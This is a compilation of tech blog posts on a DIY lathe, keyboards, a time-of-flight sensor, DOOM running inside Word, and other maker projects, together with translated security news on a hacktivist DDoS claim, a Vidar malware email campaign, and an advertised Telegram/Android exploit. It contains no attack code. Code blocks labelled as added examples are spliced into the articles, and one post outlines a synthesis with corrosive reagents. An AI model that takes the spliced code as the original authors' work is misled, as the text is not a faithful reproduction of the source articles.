Modulathe Is CNC Ready And Will Machine What You Want
Once upon a time, lathes were big heavy machines driven by massive AC motors, hewn out of cast iron and sheer will. Today, we have machine tools of all shapes and sizes, many of which are compact and tidy DIY creations. [Maxim Kachurovskiy]’s Modulathe fits the latter description nicely.
The concept behind the project was simple—this was to be a modular, digital lathe that was open-source and readily buildable on a DIY level, without sacrificing usability. To that end, Modulathe is kitted out to process metal, wooden, and plastic parts, so you can fabricate in whatever material is most appropriate for your needs.
It features a 125 mm chuck and an MT5 spindle, and relies on 15 mm linear rails, 12 mm ball screws, and NEMA23 stepper motors. Because it's modular, much of the rest of the design is up to you. You can set it up with pretty much any practical bed length—just choose the right ball screw and rail to achieve it. It's also set up to work however you like—you can manually operate it, or use it for CNC machining tasks instead.
If you want a small lathe that’s customizable and CNC-ready, this might be the project you’re looking for. We’ve featured some other similar projects in this space, too. Do your research, and explore! If you come up with new grand machine tools of your own design, don’t hesitate to let us know!
Thanks to [mip] for the tip!
Keebin’ with Kristina: the One with the Hardware-Layered Keyboard
You know (or maybe you didn’t), I get super excited when y’all use the links at the bottom of this round-up we call Keebin’ to communicate with your old pal Kristina about your various labors of love. So just remember that.
Case in point: I was typing up this very issue when I heard from [Jay Crutti] and [Marcel Erz]. Both are out there making replacement keyboards for TRS-80s — [Jay] for Models 3 and 4, and [Marcel] for the Model 1. Oooh, I said to myself. This is going at the top.
A TRS-80 Model 4. Image by [Jay Crutti] via JayCrutti.com
Relevant tangent time: I remember in the 90s having a pile of computers in my parents' basement of various vintages, a TRS-80 Model 2 among them. (Did I ever tell you about the time I got pulled over for speeding with a bunch of different computers in the backseat? I was like no, officer, first of all, those are old machines that no one would really want, and I swear I didn't steal them.)
I think the TRS-80 is probably the one I miss the most. If I still had it, you can bet I would be using [Jay] and [Marcel]’s work to build my own replacement keyboard, which the 40-year-old machine would likely need at this point if the Model 4 is any indication with its failing keyboard contacts.
To create the replacements, [Jay] used Keyboard Layout Editor (KLE), Plate & Case Builder, and EasyEDA. Using the schematic from the maintenance manual, he matched the row/column wiring of the original matrix with Cherry MX footprints. Be sure to check out [Jay]’s site for a link to the project files, or to purchase parts or an assembled keyboard. On the hunt for TRS-80 parts in general? Look no further than [Marcel]’s site.
Keyboards On the Molekula Level
While some focus aesthetically on keyboards, or on comfort, [zzeneg] is simultaneously rocking both and coming up with new keyboard frameworks. Take the open-source Molekula for example.
Image by [zzeneg] via reddit
[zzeneg] really digs modular keyboards and especially the VIK standard for interfacing data between PCBs, which calls for an FPC 12-pin, 0.5 mm pitch connector.
The big idea with molekula and future keyboards is to have dumb sides and a smart central module that does the braining and the hosting. Additionally, [zzeneg]’s plan is to keep the central PCBs’ footprint under 100 mm² in order to make it more affordable for experimentation. You can see this in the third photo of the gallery.
There are a couple of cool things going on in addition to the modularity — the switch footprints cover pretty much anything you’d want to use, and [zzeneg] left the hot swap sockets exposed around back. This thing is just cool through and through.
Via reddit
The Centerfold: Alice, 1989 Style
Image by [Brooklick] via reddit
I wouldn't mind being chained to [Brooklick]'s desk for a while. Would you? What I can tell you is that this is an Alice keyboard, and that those are 1989 keycaps and switches. Don't get too excited unless you also have an Alice; according to [Brooklick], the Space bars are crap, although they do look good.
Do you rock a sweet set of peripherals on a screamin’ desk pad? Send me a picture along with your handle and all the gory details, and you could be featured here!
Historical Clackers: the Chicago No. 3
At first glance, the Chicago No. 3 looks a bit like a car that's missing a bumper. But then you look again and see it sitting on round feet firmly planted behind the frame-less keyboard and think, it might be kind of nice to type on this one. And without that extra iron, it's probably pretty light and portable, too.
Image via The Antikey Chop
Given all of that, the No. 3 does have an interesting WERTY layout, with the ‘Q’ appearing on the bottom row. So did the model that sold concurrently, the No. 1 (which did have a frame around the keyboard). The base of the No. 3 was slotted, which made it even lighter to carry around.
Additionally, the two models had different ribbon mechanisms. The No. 3 used a 3/8″ ribbon that fed through those vertically-oriented spools, which is something I haven’t seen before. The No. 3 had two additional keys — a Backspace and a Margin Release. Whereas the No. 1 cost $35, the No. 3 went for $50 in early 1900s money (about $1,600 today).
Functionally speaking, the two were quite similar. In addition to both having a WERTY keyboard, they each used a typesleeve — a cylindrical component that can be swapped out, much like the IBM Selectric’s golf ball type element — and a hammer to print. Interestingly enough, in order to use either model, the typist had to turn the safety off by pulling a “hammer extension arm” on the left side before typing. Hopefully, nothing terrible happened if you forgot to do this.
And What Do We Think of Hardware Layers?
Madden was here. Image via AutoKeybo
Wow. This might actually be a good use of image recognition; I am undecided. It certainly looks cool at first blush, anyway. And I hope it makes a little zhoop! sound in the process of working.
Okay, so, imagine you’re sitting there at your split keyboard and need to mouse or enter some digits real fast. With this number, all you have to do is stretch out your fingers for a second and whoosh — the QWERTY retracts, and in its place comes a 10-key on the left and a mouse on the right.
That’s the power of AutoKeybo. Here, watch the demo video. It’s only nine seconds long.
youtube.com/embed/GXim-IJ4EXc?…
So, let’s start with the obvious. This is supposed to be an ergonomic keyboard, given that you don’t have to move your hand over to mouse. But you do have to rest your arms on a big plastic box that’s two keyboards tall, and that probably isn’t good for you. But it is split, and the sides are angled toward one another, so there’s that.
The cool part is that the trays move independently, so you just stretch out whichever hand is hiding what you need to use real quick. It would be nice to access the mouse without losing the left half of the keyboard. Don’t ask me why, it just would. Just so you wouldn’t have to move both hands.
Okay, so how does it work already? Basically, there’s a built-in camera that detects the splaying of your fingers to trigger the switch. It has a Raspberry Pi 5 doing all of the crunching, which of course you could use as a standalone computer. Here’s a report from someone else who tried it out at CES.
Got a hot tip that has like, anything to do with keyboards? Help me out by sending in a link or two. Don’t want all the Hackaday scribes to see it? Feel free to email me directly.
DIY Strontium Aluminate Glows in the Dark
[Maurycyz] points out right up front: several of the reagents used are very corrosive and can produce toxic gasses. We weren't sure if they were trying to dissuade us from replicating it or encourage us to do so. The project in question is making strontium aluminate which, by the way, glows in the dark.
The material glows strongly for hours and, despite the dangers of making it, it doesn't require anything very exotic. As [Maurycyz] points out, oxygen and aluminum are everywhere. Strontium sounds uncommon, but apparently, it is used in ceramics.
For the chemists among us, there’s an explanation of how to make it by decomposing soluble nitrate salts. For the rest of us, the steps are to make aluminum hydroxide using potassium alum, a food preservative, and sodium hydroxide. Then, it is mixed with nitric acid, strontium carbonate, europium, and dysprosium. Those last elements determine the color of the glow.
A drying step removes the acid, followed by dissolving with urea and water. The heat of the reaction wasn’t enough to form the final product, but it took time with an oxy-propane torch to form blobs of strontium aluminate. The product may not have been pure, because it didn’t glow for hours like commercial preparations. But it did manage to glow for a few minutes after light exposure.
We try to limit our chemistry to less toxic substances, although ferric chloride can make a mess. You could probably track down the impurities with a gas chromatograph. What we really want is a glow-in-the-dark car antenna.
OverFlame vs Anonymous Italia: The AISE Site in the Crosshairs, Hit With Little Success
As recently reported, the Italian hacker collective Anonymous Italia launched a targeted attack in retaliation for the recent operations carried out by the NoName057(16) group. The action, named “dis-CARICA dei 101”, is part of the wider #OpRussia initiative and led to the defacement of 101 Russian websites linked to online ticketing systems for public transport in the Russian Federation.
This coordinated response by Anonymous Italia sends a clear message of opposition to the cyberattacks conducted by NoName057(16), consolidating their commitment within the campaign against strategic Russian targets.
In a further escalation, this morning the OverFlame group, as a countermove to Anonymous Italia's attacks, claimed an action of its own, publishing the following message on its Telegram channel:
Good morning, Russia 🇷🇺
We are launching a counter-operation on Italy, “Defuse 102”, in response to the attacks by Italian hacktivists. The first target was the Italian state security service; the target is severely damaged 🔥
Report:
❌check-host.net/check-report/22…
Glory to Russia 🇷🇺
For Kursk ❤️
For Donbass ❤️
For Belgorod ❤️
#OP404
OverFlame|OverFlame Reserve|FORUM|contact us -> @OverFlame_contact_bot
The impact of the attack
According to the link published on OverFlame's Telegram channel, the site they claim to have targeted is a page of the AISE, specifically sicurezzanazionale.gov.it/web.…. Moreover, that page does not appear to be the AISE's actual page (and in fact it returns a 404 in the body).
AISE is the acronym for Agenzia Informazioni e Sicurezza Esterna, the Italian intelligence service responsible for national security in activities abroad. AISE is one of Italy's two main intelligence agencies, alongside AISI (Agenzia Informazioni e Sicurezza Interna), and is part of the Sistema di Informazione per la Sicurezza della Repubblica (SISR).
The site has remained fully functional throughout, so it is likely that only some connections went offline, as shown in the Check-Host report published by the pro-Russian hacktivist group.
OverFlame announces a partnership with NoName057(16)
The OverFlame group, active since January 2025, formalised an operational partnership with the NoName057(16) collective on 16 January, consolidating a collaboration aimed at strengthening their joint actions.
Until today, OverFlame had never targeted Italian objectives, making the current attack a significant escalation in its operations. The group had, however, already distinguished itself with a series of campaigns against websites in Lithuania, characterised by the national .lt domain, confirming a strategic focus on specific targets.
The article “OverFlame vs Anonymous Italia: The AISE Site in the Crosshairs, Hit With Little Success” originally appeared on il blog della sicurezza informatica.
Time-of-Flight Sensors: How Do They Work?
With the right conditions, this tiny sensor can measure 12 meters
If you need to measure a distance, it is tempting to reach for the ubiquitous ultrasonic module like an HC-SR04. These work well, and they are reasonably easy to use. However, they aren't without their problems. So maybe try an IR time of flight sensor. These also work well, are reasonably easy to use, and have a different set of problems. I recently had a project where I needed such a sensor, and I picked up a TF-MiniS, which is a popular IR distance sensor. They aren't very expensive, and they work over serial or I2C. So how did it do?
The unit itself is tiny and has good specifications. You can fit the 42 x 15 x 16 mm module anywhere. It only weighs about five grams — as the manufacturer points out, less than two ping-pong balls. It needs 5 V but communicates using 3.3 V, so integration isn’t much of a problem.
At first glance, the range is impressive. You can read things as close as 10 cm and as far away as 12 m. I found this was a bit optimistic, though. Although the product sometimes gets the name of LiDAR, it doesn’t use a laser. It just uses an IR LED and some fancy optics.
How it Works
The simple explanation for how these sensors work is that they bounce light off a target and measure how long it takes to see the reflection. This is oversimplified, but one thing to keep in mind is that light is fast. To measure a millimeter, you need to measure a difference of less than 7 picoseconds. Light travels 1 mm in 3.3 picoseconds, and then the return flight doubles that.
How time of flight works (from the TFmini-S Product Guide)
Because of practical considerations, there are typically a few specialized techniques used. A pulsed sensor turns the illumination on and off and samples pixels to determine the ratio of the overlap in the outbound beam and the reflected light.
It is also possible to sample four measurements on each cycle (that is, four measurements 90 degrees apart) and compute the distance with some fancy trigonometry. TI has a paper that goes into some detail. Or, if you prefer video, they have a video on the topic, too, which you can see below.
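The two ideas above, the round-trip timing that makes direct measurement so demanding and the four-sample phase method, can be worked through numerically. The block below is an added example and is not code from the article or from Benewake; it assumes an idealised continuous-wave demodulation in which the four correlation samples are taken at 0, 90, 180 and 270 degrees of the modulation phase, with no noise, so it illustrates the arithmetic rather than any particular sensor's hardware. It also shows the aliasing that follows from this method: beyond c/(2f) the phase wraps and a far target reads as a near one.

```python
# Added example (not from the article): direct ToF timing and the four-phase
# continuous-wave distance calculation, simulated end to end.
# Assumptions: ideal samples, no noise, samples at 0/90/180/270 degrees.
import math

C = 299_792_458.0  # speed of light, m/s


def round_trip_time(distance_m):
    """Seconds between emitting light and seeing its reflection from distance_m."""
    return 2.0 * distance_m / C


def four_phase_samples(distance_m, mod_freq_hz, amplitude=1.0, offset=0.0):
    """Ideal correlation samples at 0, 90, 180 and 270 degrees of modulation phase.

    The reflected wave lags the emitted one by phi = 4*pi*f*d/c (two-way path).
    'offset' stands in for ambient light, 'amplitude' for target reflectivity.
    """
    phi = 4.0 * math.pi * mod_freq_hz * distance_m / C
    return [offset + amplitude * math.cos(phi - k * math.pi / 2) for k in range(4)]


def phase_from_samples(a0, a1, a2, a3):
    """Recover the phase lag from the four samples.

    Differences of opposite samples cancel the ambient-light offset, and the
    arctangent of their ratio cancels the reflectivity amplitude.
    """
    phi = math.atan2(a1 - a3, a0 - a2)
    return phi % (2.0 * math.pi)


def distance_from_phase(phi, mod_freq_hz):
    """Invert phi = 4*pi*f*d/c for the one-way distance."""
    return C * phi / (4.0 * math.pi * mod_freq_hz)


def unambiguous_range(mod_freq_hz):
    """Beyond c/(2f) the phase has wrapped once and the distance is aliased."""
    return C / (2.0 * mod_freq_hz)


def measure(distance_m, mod_freq_hz, amplitude=0.3, offset=2.0):
    """Simulate a full measurement: sample, demodulate, convert to distance."""
    samples = four_phase_samples(distance_m, mod_freq_hz, amplitude, offset)
    return distance_from_phase(phase_from_samples(*samples), mod_freq_hz)


if __name__ == "__main__":
    print("1 mm round trip: %.2f ps" % (round_trip_time(0.001) * 1e12))
    f = 10e6  # 10 MHz modulation: unambiguous range is about 15 m
    print("unambiguous range at 10 MHz: %.2f m" % unambiguous_range(f))
    for d in (0.5, 3.0, 12.0, 20.0):
        print("true %.1f m -> measured %.3f m" % (d, measure(d, f)))
```

The last line of the demo is the instructive one: a 20 m target at 10 MHz modulation comes back as roughly 5 m, because 20 m exceeds the 15 m unambiguous range. Sensors deal with this either by limiting the rated range, as the 12 m figure here does, or by combining two modulation frequencies.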
youtube.com/embed/TpjnooXhOmY?…
Practical Concerns
Of course, you can’t measure infinitesimally small times, so the sensors are typically blind when you get too close. This sensor claims to be able to read as little as 10 cm. However, if you read closely, you’ll see that if the total distance is under 6 meters, the sensor is only accurate to within plus or minus 6 cm. So at 10 cm, you might read 4 cm to 16 cm, which is a pretty big difference.
Ambient light can affect measurements, too. One thing you might not think about is that it also matters how reflective the target item is. All of these things can reduce the 12-meter range.
You really want a flat target (image from the TFmini-S product manual)
You also have to think about the field of view. The further away something is, the larger it needs to be. At 12 meters, for example, the target has to be at least 42 cm on a side to present a big enough target. At 1 meter, a 3.5 cm side will suffice.
The target must also be fairly flat in the field of view. If the sensor sees a partial reflection at one distance and more reflection at a further distance, you’ll get an inaccurate reading. None of these things are insurmountable, of course.
Connecting isn’t hard. You use the red/black wires for 5 V power. A 3.3 V serial port is on the white and green wires: white is the line the unit receives data on. We’ve read that if you hook these up backwards or overvolt them, they’ll die. We didn’t test that.
Code
It is pretty easy to write some MicroPython code to get some readings. You can download the code to try it out. The heart of it is very simple:
from machine import UART

NUM_SAMPLES = 10                  # readings averaged per printed value
uart = UART(1, baudrate=115200)   # TFmini-S default is 115200 baud; choose the UART/pins for your board

def get_lidar_data():             # minimal stand-in for the helper in the downloadable code
    f = uart.read(9)              # one frame: 0x59 0x59, dist, strength, temp (LSB first), checksum
    if not f or len(f) != 9 or f[0] != 0x59 or f[1] != 0x59 or sum(f[:8]) & 0xFF != f[8]:
        return -1, 0, 0           # short, unsynchronised or corrupted frame: report an error
    return f[2] | f[3] << 8, f[4] | f[5] << 8, f[6] | f[7] << 8

while True:
    total_distance = 0
    valid_samples = 0
    for _ in range(NUM_SAMPLES):
        distance, strength, _ = get_lidar_data()
        if distance >= 0 and strength >= 100:  # throw out "weak" values or errors
            total_distance += distance
            valid_samples += 1  # only count good values
    if valid_samples > 0:
        print(total_distance / valid_samples)
By default, the device sends data out frequently. If you want to change things, you can, and you can even save your setup so that the sensor keeps operating with your last settings after a power cycle.
The output is two 0x59 bytes followed by the distance (two bytes), the strength (two bytes, LSB), a device temperature (two bytes), and a checksum. All the two-byte values are least-significant byte first.
Commands all start with 0x5A and the length of the packet. Then there’s a command code, any data the command needs, and a checksum. Many of the commands are fixed, so the checksum is already computed in the documentation for you.
Speaking of documentation, if you want to write your own code, you don’t really need the datasheet. You do want the “Product Manual” from the Benewake website. The commands are all in that document. You can switch to a readout in millimeters or centimeters. You can set how often the system sends data. You can also put it in a polling mode. The slowest you can get data is once per second.
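The frame and command formats just described are easy to get subtly wrong (misaligned reads, a bad byte accepted as data), so here is an added example, not the article's code and not Benewake's, that parses a raw byte stream into readings with header resynchronisation and checksum verification, applies the same strength filter and averaging as the loop above, and builds command packets with their checksum computed. It runs unchanged on CPython and MicroPython. Assumed here, as the article does not spell them out: the checksum is the low 8 bits of the sum of the preceding bytes, the temperature field converts as raw/8 - 256 °C, and the command ids in the constants are as given in the TFmini-S product manual (check them against your copy before sending). The sample byte stream is constructed for the demonstration.

```python
# Added example (not from the article): TFmini-S frame parsing, filtering,
# and command packet construction. Frame layout per the article: 0x59 0x59,
# distance (2 bytes), strength (2 bytes), temperature (2 bytes), checksum,
# all 16-bit values LSB first. Assumed: checksum = low byte of the sum of the
# preceding bytes; temperature °C = raw / 8 - 256 (TFmini-S product manual).
import struct

FRAME_HEADER = b"\x59\x59"
FRAME_LEN = 9
MIN_STRENGTH = 100  # the article's threshold: weaker returns are unreliable

# Command ids per the TFmini-S product manual (verify against your revision).
CMD_FRAME_RATE = 0x03     # payload: rate in Hz, 16-bit LSB first; 0 selects polling mode
CMD_TRIGGER = 0x04        # request a single frame while in polling mode
CMD_OUTPUT_FORMAT = 0x05  # payload 0x01 = 9-byte frames in cm, 0x06 = 9-byte frames in mm
CMD_SAVE = 0x11           # persist the current settings


def checksum(data):
    """Low byte of the byte sum; the same rule covers output frames and commands."""
    return sum(data) & 0xFF


def parse_frames(buf):
    """Scan a raw byte buffer and return (distance, strength, temperature_c) per valid frame.

    The scan slides one byte at a time until it finds 0x59 0x59 followed by a
    frame whose checksum verifies, so stray bytes, a lone 0x59, or a corrupted
    frame are skipped rather than decoded as a bogus reading.
    """
    readings = []
    i = 0
    while i + FRAME_LEN <= len(buf):
        if buf[i:i + 2] != FRAME_HEADER:
            i += 1
            continue
        frame = buf[i:i + FRAME_LEN]
        if checksum(frame[:8]) != frame[8]:
            i += 1  # false header or corrupted frame: resynchronise
            continue
        distance, strength, temp_raw = struct.unpack("<HHH", frame[2:8])
        readings.append((distance, strength, temp_raw / 8 - 256))
        i += FRAME_LEN
    return readings


def average_distance(readings, min_strength=MIN_STRENGTH):
    """Mean of distances with adequate strength, or None if nothing qualified."""
    good = [d for d, s, _ in readings if d >= 0 and s >= min_strength]
    return sum(good) / len(good) if good else None


def build_command(command_id, payload=b""):
    """Command packet: 0x5A, total length, command id, payload, checksum."""
    body = bytes([0x5A, 4 + len(payload), command_id]) + bytes(payload)
    return body + bytes([checksum(body)])


def make_frame(distance, strength, temp_raw):
    """Constructed output frame in the sensor's format (used for the sample below)."""
    body = FRAME_HEADER + struct.pack("<HHH", distance, strength, temp_raw)
    return body + bytes([checksum(body)])


# Constructed sample stream: stray bytes (including a lone 0x59), two good
# frames, one frame with a flipped strength byte, and one weak reflection.
_corrupt = bytearray(make_frame(124, 490, 2200))
_corrupt[4] ^= 0xFF
SAMPLE_STREAM = (
    b"\x00\x59"
    + make_frame(123, 500, 2200)
    + make_frame(125, 480, 2200)
    + bytes(_corrupt)
    + make_frame(300, 40, 2200)  # strength 40: dropped by the filter
)


if __name__ == "__main__":
    readings = parse_frames(SAMPLE_STREAM)
    print("decoded:", readings)
    print("average distance:", average_distance(readings))
    print("set mm output:", build_command(CMD_OUTPUT_FORMAT, b"\x06").hex())
    print("100 Hz frames :", build_command(CMD_FRAME_RATE, bytes([100, 0])).hex())
    print("save settings :", build_command(CMD_SAVE).hex())
```

On a board, feed parse_frames whatever uart.read() returns and keep any trailing partial frame for the next call; the resynchronisation logic means a read that starts mid-frame costs at most one frame. The checksum check is the part worth keeping even in a quick hack: a single corrupted byte in the distance field otherwise turns into a plausible-looking reading that no amount of averaging will remove.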
In Use
A simple but effective test setup.
So how did it work? Some informal testing on the bench wasn’t too bad. The error at near distances was within range but pretty bad at about 3 cm. However, it looked relatively constant, so you can account for it in your code. We don’t know if different materials or different sensors would require different offsets, but we’d guess they do.
There was some very small noise in the sensor output, but, honestly, not much. There were no wild results to filter out. Averaging didn’t buy much because the output was pretty stable already.
Conclusion
Like most things, this is a good solution if you need it, but there are other options, and you have to weigh the pros and cons of each method. Of course, you can build your own, which might help you optimize. Sometimes, the ultrasonic sensors are just fine.
Every Monday Morning: PEC Alert! Vidar Malware Strikes Italians Again
Vidar malware campaigns continue at their now-regular cadence, CERT-AgID reports, targeting Italian users every Monday morning.
The latest wave, detected on the night of 20 January 2025, once again exploits compromised PEC (certified e-mail) mailboxes to send e-mails exclusively to PEC mailbox holders, relying on the trustworthiness of these communications to maximise the attacks' success rate.
As already observed in previous campaigns, this time too the malicious actors made extensive use of the Domain Generation Algorithm (DGA) technique and rotated among numerous hosts: 147 hosts were detected being used to distribute the payload in the form of a JavaScript file.
These strategies, although well known and long exploited, always prove effective at complicating detection and mitigation of the campaigns. In particular, the DGA-generated URLs and randomised paths remain inactive during the attack's initial overnight phase and only become active the following morning, increasing the difficulty of proactive prevention.
Countermeasures have already been put in place with the support of the PEC providers. The IoCs for the campaign have been distributed through the CERT-AGID IoC feed to the PEC providers and to accredited organisations.
Users are advised to always pay the utmost attention to communications received via PEC, particularly when they contain links deemed suspicious. When in doubt, suspicious e-mails can always be forwarded to the mailbox malware@cert-agid.gov.it
The article “Every Monday Morning: PEC Alert! Vidar Malware Strikes Italians Again” originally appeared on il blog della sicurezza informatica.
Who's who on tech policy in Trump 2.0 administration
WELCOME BACK. THIS IS DIGITAL POLITICS. I'm Mark Scott, and as many of us unpack the impact of Meta's recent decision to roll back its content moderation policies, here's a reminder that Mark Zuckerberg, the company's chief executive, once had an extremely awkward interaction with astronauts. Enjoy.
— Jan 20 marks the start of Donald Trump's second term in the White House. Here are the people you need to know that will shape tech policy over the next four years.
— The 'will they, or won't they' ban on TikTok in the United States is a reminder, to all countries, that you shouldn't mistake national security for digital policymaking.
— In case it wasn't clear, the US dominates the world of 'online platforms.' But countries from Singapore to Turkey are making a play, too.
Let's get started:
You Can Now Play DOOM In Microsoft Word, But You Probably Shouldn’t
DOOM used to primarily run on x86 PCs. It later got ported to a bunch of consoles with middling success, and then everything under the sun, from random embedded systems to PDFs. Now, thanks to [Wojciech Graj], you can even play it in Microsoft Word.
To run DOOM inside Microsoft Word, you must enable VBA macros, and ignore security warnings, to boot. You’ll need a modern version of Word, and it will only work on Windows on an x64 CPU. As you might imagine, too, the *.DOCM file is not exactly lightweight. It comes in at 6.6 MB, no surprise given it contains an entire FPS. It carries inside it a library called doomgeneric_docm.dll and the whole doom1.wad data file. Once the file is opened, a macro then extracts all the game data and executes it.
If you think that Microsoft Word doesn’t really have a way of displaying live game graphics, you’d be correct. Instead, that DLL is creating a bitmap image of the game state for every frame, which is then displayed inside Word itself. It uses the GetAsyncKeyState function to grab inputs from the arrow keys, number keys, and CTRL and space so the player can move around. It certainly sounds convoluted, but it actually runs pretty smoothly given all the fuss.
While this obviously works, you shouldn’t get in the habit of executing random code in your word processor. It’s just not proper, you see, like elbows on the dinner table! And, you know. It’s insecure. So don’t do that.
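The file described above has a recognisable shape: a macro-enabled document whose VBA project is accompanied by large binary parts that the macro drops and runs. Because a .docm is just a ZIP container, that shape can be checked without opening the document in Word. The block below is an added example, not the article's or [Wojciech Graj]'s code, of a mail-gateway-style triage check: it lists the container's parts, notes whether a VBA project is present, and flags oversized or executable-looking parts. The part paths, size threshold and the sample container it builds are all constructed for the demonstration; real documents embed payloads in various places, so treat the heuristics as a starting point.

```python
# Added example (not from the article): triage of a Word OOXML container for
# the "VBA project plus embedded binaries" pattern. Constructed assumptions:
# the 1 MB per-part threshold, the suffix list, and the sample .docm-like
# ZIP built by build_sample_docm().
import io
import zipfile

VBA_PART = "word/vbaProject.bin"          # where Word stores the VBA project
LARGE_PART_BYTES = 1_000_000              # constructed threshold for a "large" part
BINARY_SUFFIXES = (".dll", ".exe", ".wad")  # constructed list of payload-like names


def inspect_docx_container(data):
    """Return findings for a Word OOXML container supplied as bytes."""
    findings = {"has_vba": False, "large_parts": [], "binary_parts": [],
                "total_size": len(data)}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            name = info.filename
            if name == VBA_PART:
                findings["has_vba"] = True
            if info.file_size >= LARGE_PART_BYTES:
                findings["large_parts"].append((name, info.file_size))
            if name.lower().endswith(BINARY_SUFFIXES):
                findings["binary_parts"].append(name)
    return findings


def risk_summary(findings):
    """Plain-language verdict; VBA plus embedded binaries is the pattern to stop."""
    if findings["has_vba"] and (findings["large_parts"] or findings["binary_parts"]):
        return "high: macro-enabled document carrying embedded binary payloads"
    if findings["has_vba"]:
        return "medium: macro-enabled document"
    return "low: no VBA project part"


def build_sample_docm(with_payload):
    """Constructed stand-in for a .docm: minimal OOXML parts plus an optional payload.

    The part names under word/embeddings and word/media are invented for the
    demonstration; they only reuse the file names the article mentions.
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr(VBA_PART, b"\xd0\xcf\x11\xe0" + b"\x00" * 64)  # OLE2 magic, stub body
        if with_payload:
            zf.writestr("word/embeddings/doomgeneric_docm.dll", b"MZ" + b"\x90" * 512)
            zf.writestr("word/media/doom1.wad", b"IWAD" + bytes(LARGE_PART_BYTES))
    return buf.getvalue()


if __name__ == "__main__":
    for label, sample in (("game", build_sample_docm(True)),
                          ("plain macro doc", build_sample_docm(False))):
        findings = inspect_docx_container(sample)
        print(label, "->", risk_summary(findings))
        for name, size in findings["large_parts"]:
            print("  large part:", name, size, "bytes")
        for name in findings["binary_parts"]:
            print("  binary part:", name)
```

The point of separating inspect_docx_container from risk_summary is that the first produces facts you can log and the second applies policy; a gateway that simply strips or quarantines anything rated "high" would catch this file without needing to know it is DOOM, and the same check applied to .xlsm and .pptm containers (the VBA part lives under xl/ and ppt/ there) covers the rest of the Office family.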
youtube.com/embed/G3XoOCMnSNg?…
[Thanks to Josiah Gould for the tip!]
Innovative Clock Uses Printed Caustic Lens
Hackers and makers have built just about every kind of clock under the sun. Digital, analog, seven-segment, mechanical seven-segment, binary, ternary, hexadecimal… you name it. It’s been done. You really have to try to find something that shocks us… something we haven’t seen before. [Moritz v. Sivers] has done just that. Wild. Just wild.
Meet the Caustic Clock. It’s based on the innovative Hollow Clock from [shiura]. It displays time with an hour hand and a minute hand, and that’s all so conventional. But what really caught our eye was the manner in which its dial works. It uses caustics to display the clock dial on a wall as light shines through it.
If you’ve ever seen sunlight reflect through a glass, or the dancing patterns in an outdoor swimming pool, you’ve seen caustics at play. Caustics are the bright patterns we see projected through a transparent object, and if you shape that object properly, you can control them. In this case, [Moritz] used some GitHub code from [Matt Ferraro] to create a caustic projection clockface, and 3D printed it using an SLA printer.
The rest of the clock is straightforward enough—there’s some WS2812 LEDs involved, an Arduino Nano, and even an RP2040. But the real magic is in the light show and how it’s all achieved. We love learning about optics, and this is a beautiful effect well worth studying yourself.
youtube.com/embed/vHKDAkZ5_38?…
“The EvilLoader”: The Exploit Threatening Telegram and Android Users
In a recent post published on the underground forum XSS.IS, a user known by the nickname “Ancryno” advertised an exploit tool called “The EvilLoader”. This exploit, according to its author, is designed to target Android users through manipulated Telegram videos. The author stresses that the exploit can be customised to the attacker's needs, making it a versatile and particularly insidious threat. But what are the details of this threat, and what could its repercussions be for the cybersecurity landscape?
The Content of the Post
The message opens in a self-congratulatory tone, emphasising the author's commitment to releasing new exploit technologies. Specifically, the post highlights the following features of the exploit:
- Compatibility with all Android versions of Telegram.
- Customisable functionality, including the ability to upload spoofed content and manipulated videos.
- “User satisfaction bypass”, which suggests the ability to evade security checks or disguise malicious activity.
A particularly worrying aspect is the claim that the tool can be used for:
- Infecting Android devices.
- Theft of Telegram sessions, with direct implications for the theft of personal and corporate data.
- Creation of customised phishing attacks exploiting the Telegram platform.
Analysis and Implications
If what the post describes were true, “The EvilLoader” would represent a highly sophisticated threat, especially considering how widely Telegram is used as a messaging platform both personally and professionally. Attackers could exploit apparently harmless videos to deliver malicious payloads, enabling the installation of malware on victims' devices.
The theft of Telegram sessions, in particular, could have devastating consequences. Telegram uses an authentication system based on codes sent via SMS which, once compromised, could allow attackers to take complete control of victims' accounts. This could lead to:
- Theft of sensitive data, including messages, shared files and contacts.
- Access to private channels and groups, with potentially catastrophic consequences for organisations that use Telegram for internal communications.
- Execution of secondary attacks, such as phishing or spam, exploiting other users' trust in the compromised accounts.
XSS.IS and the Exploit Market
The XSS.IS forum is known as a meeting point for cybercriminals, hackers and exploit sellers. The fact that tools like “The EvilLoader” are advertised on these platforms underlines how flourishing and constantly evolving the exploit market is. Moreover, the post's author refers to a sales model based on escrow, which guarantees secure transactions between buyer and seller, demonstrating the professionalisation of these criminal environments.
Repercussions for the Cybersecurity Landscape
The growing spread of exploits such as “The EvilLoader” poses significant challenges for cybersecurity companies and end users alike. The main concerns include:
- An increase in targeted attacks: customisable tools allow attackers to tailor their attacks to specific targets, increasing the effectiveness of malicious campaigns.
- Erosion of trust in platforms: attacks of this kind undermine users' trust in platforms such as Telegram, which are increasingly used in professional settings as well.
- Evolution of defensive techniques: cybersecurity experts will have to develop more advanced countermeasures to identify and block attacks delivered through apparently harmless multimedia files.
In conclusion, the post by “Ancryno” on the XSS.IS forum is a clear example of how rapidly the threat landscape is evolving. Tools such as “The EvilLoader” represent a concrete threat not only to individual users but also to organisations that use Telegram as a communication platform. It is essential that users adopt adequate security practices, such as using two-factor authentication and regularly updating their applications, to mitigate the risks. At the same time, cybersecurity companies must continue to monitor underground forums closely in order to anticipate and counter these new threats.
The article “The EvilLoader”: The Exploit Threatening Telegram and Android Users originally appeared on il blog della sicurezza informatica.
Bone Filament, For Printing Practice Bones
Of course there is bone-simulation filament on the market. What’s fun about this Reddit thread is all of the semi-macabre concerns of surgeons who are worried about its properties matching the real thing to make practice rigs for difficult surgeries. We were initially creeped out by the idea, but now that we think about it, it’s entirely reassuring that surgeons have the best tools available for them to prepare, so why not 3D prints of the actual patient’s bones?
[PectusSurgeon] says that the important characteristics were that it doesn't melt under the bone saw and is mechanically similar, but also that it looks right under x-ray, for fluoroscopic surgery training. But at $100 per spool, you would be forgiven for looking around for substitutes. [ghostofwinter88] chimes in saying that their lab used a high-wood-content PLA, but couldn't say much more, and then got into a discussion of how different bones feel under the saw, before concluding that they eventually chose resin.
Of course, Reddit being Reddit, the best part of the thread is the bad jokes. “Plastic surgery” and “my insurance wouldn’t cover gyroid infill” and so on. We won’t spoil it all for you, so enjoy.
